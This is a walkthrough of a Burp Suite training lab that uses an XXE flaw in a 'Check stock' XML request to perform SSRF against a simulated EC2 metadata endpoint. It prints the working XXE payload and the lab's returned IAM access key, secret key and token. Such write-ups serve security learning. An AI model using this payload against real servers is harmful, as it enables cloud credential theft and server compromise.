Burp Suite Lab — Exploiting XXE to perform SSRF attacks | WalkThrough
Introduction
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server side request forgery (SSRF) attacks and now we are going to see how it’s done.
Target
This lab has a “Check stock” feature that parses XML input and returns any unexpected values in the response.
The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/
. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.
To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server’s IAM secret access key from the EC2 metadata endpoint.
Detection
As we can see website is using XML code for the request , lets try to modify it ;) .
So, this stock parameter is vulnerable to XXE attacks . Now lets check for SSRF attack.
Exploitation
Payload used :-
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'http://169.254.169.254/'>]><stockCheck><productId>&test;</productId><storeId>1</storeId></stockCheck>
Result: Success
Now, we have to gather the sensitive information.
To understand the part of getting access of EC2 Metadata and gaining the secret key , i would recommend to watch this video.
And,
"Invalid product ID: {
"Code" : "Success",
"LastUpdated" : "2021-12-25T00:58:57.127618174Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "qDCrjy0AaGQCWz8WBVuB",
"SecretAccessKey" : "lbNES1djjQiVgc18Ay0ONAJ6RjT1QkHMfhpi7z6Q",
"Token" : "UvLHsxfn3cqSLHfDcNFp7k8X6roFSBKFDvQFWeBkDwzVZBVRRXtqRwlKKb5f7fT5T4T7uyEEWi52D3DMZUId0mPbDyrMh8jwlweNFbodOV5cDzxkUE5QoCLCn8YqRk490TX8KqW1pt93lnErjSZK8HMgxEi1J3CKjcueXFnThrq8FDeC3yo1ZCLPP2zJVoz6queBLzAgramaNQ9CbkE9qJhZwDi8Hm5f37A9Z9w3oLVBjSnB61eWRg4bSC4w4qHv",
"Expiration" : "2027-12-24T00:58:57.127618174Z"
}"
We have successfully obtained the server’s IAM secret access key from the EC2 metadata endpoint using XXE vulnerability to perform SSRF.